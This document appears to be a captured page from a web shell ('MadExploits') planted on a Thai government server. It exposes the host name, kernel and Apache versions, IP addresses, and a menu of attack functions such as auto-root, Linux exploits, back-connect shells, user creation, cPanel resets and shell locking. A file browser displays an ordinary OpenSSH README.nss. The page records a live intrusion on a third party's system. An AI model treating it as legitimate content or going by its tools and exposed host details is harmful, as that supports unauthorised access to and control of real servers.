Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
openssh-5.3p1 /
[ HOME SHELL ]
Name
Size
Permission
Action
CREDITS
5.42
KB
-rw-r--r--
ChangeLog
91.07
KB
-rw-r--r--
INSTALL
9.2
KB
-rw-r--r--
LICENCE
15.63
KB
-rw-r--r--
OVERVIEW
6.56
KB
-rw-r--r--
PROTOCOL
10.13
KB
-rw-r--r--
PROTOCOL.agent
17.55
KB
-rw-r--r--
PROTOCOL.certkeys
9.89
KB
-rw-r--r--
README
2.66
KB
-rw-r--r--
README.dns
1.57
KB
-rw-r--r--
README.nss
1.01
KB
-rw-r--r--
README.platform
3.92
KB
-rw-r--r--
README.privsep
2.6
KB
-rw-r--r--
README.smartcard
2
KB
-rw-r--r--
README.tun
4.78
KB
-rw-r--r--
TODO
2.71
KB
-rw-r--r--
WARNING.RNG
4.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.nss
How to use NSS tokens with OpenSSH? This version of OpenSSH contains experimental support for authentication using keys stored in tokens stored in NSS database. This for example includes any PKCS#11 tokens which are installed in your NSS database. As the code is experimental and preliminary only SSH protocol 2 is supported. The NSS certificate and token databases are looked for in the ~/.ssh directory or in a directory specified by environment variable NSS_DB_PATH. Common operations: (1) tell the ssh client to use the NSS keys: $ ssh -o 'UseNSS yes' otherhost if you want to use a specific token: $ ssh -o 'UseNSS yes' -o 'NSS Token My PKCS11 Token' otherhost (2) or tell the agent to use the NSS keys: $ ssh-add -n if you want to use a specific token: $ ssh-add -n -T 'My PKCS11 Token' (3) extract the public key from token so it can be added to the server: $ ssh-keygen -n if you want to use a specific token and/or key: $ ssh-keygen -n -D 'My PKCS11 Token' 'My Key ID' Tomas Mraz, Red Hat, Inc.
Close